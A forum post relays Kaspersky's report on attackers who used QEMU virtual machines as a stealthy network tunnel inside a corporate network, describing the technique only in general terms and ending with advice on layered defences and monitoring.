Hackers use QEMU vi...
Clear all

Hackers use QEMU virtual machines and network tunnels

1 Posts
1 Users
Brandon Lee
Posts: 543
Member Admin
Topic starter

Cybersecurity researchers at Kaspersky have unearthed a sophisticated cyberattack targeting a large corporation, where attackers exploited the open-source hypervisor QEMU as an innovative tunneling mechanism. QEMU, widely recognized for its capability to emulate operating systems and hardware platforms, was manipulated to forge virtual network interfaces and a socket-type network device. This setup enabled a discreet network tunnel between the victim's infrastructure and the attacker's server, with minimal impact on the system's performance.

Network Tunnels

This incident underscores the adaptability and stealth tactics employed by cyber adversaries. Network tunnels are often crafted by attackers to establish a hidden and secure communication pathway with a compromised system, typically encrypting traffic to elude firewalls and intrusion detection systems. Commonly, utilities such as FRP, ngrok, and CloudFlare tunnels, among others, are utilized for such purposes. Given their frequent misuse, these tools are generally approached with caution by cybersecurity defenses.

However, the choice of QEMU by the attackers in this scenario was particularly notable for its deviation from conventional tunneling tools, prioritizing stealth over traffic encryption. QEMU's extensive emulation capabilities and ability to simulate virtual networks make it an excellent tool for blending malicious operations within legitimate virtualization traffic and facilitating lateral movement across segmented network zones.

Stealthy backdoor

In their sophisticated approach, the attackers employed additional tools like 'Angry IP Scanner' for network reconnaissance and 'mimikatz' for credential harvesting, alongside the strategic use of QEMU for network tunneling. To maintain a low detection profile, the virtual machine configured for the attack was allocated merely 1MB of RAM and operated without a graphical interface, further minimizing its system footprint.

The attackers configured the QEMU VM with specific command-line arguments to establish unrestricted network access, socket connections to their server, and interconnectivity between various network backends, effectively camouflaging their presence and activities within the targeted network.

Kaspersky's analysis included simulating the attacker's QEMU setup to understand its mechanics and implications. The simulation illustrated how the attackers bridged an internal host, devoid of direct internet access, to an external pivot point with internet connectivity, ultimately linking to a cloud-based attacker server. This method showcased the attackers' ability to circumvent network security measures and potentially extend their reach within the targeted network.

Kaspersky's findings highlight the necessity for organizations to implement multi-layered security defenses, emphasizing continuous network monitoring to detect and counteract the misuse of legitimate tools in cyberattacks. This strategy underscores the importance of comprehensive security solutions, incorporating endpoint protection and specialized tools to thwart advanced, targeted threats. Effective cybersecurity requires not just robust technology but also skilled security operations center (SOC) personnel to identify and neutralize threats promptly, safeguarding against initial stages of an attack.


Posted : 05/03/2024 3:38 pm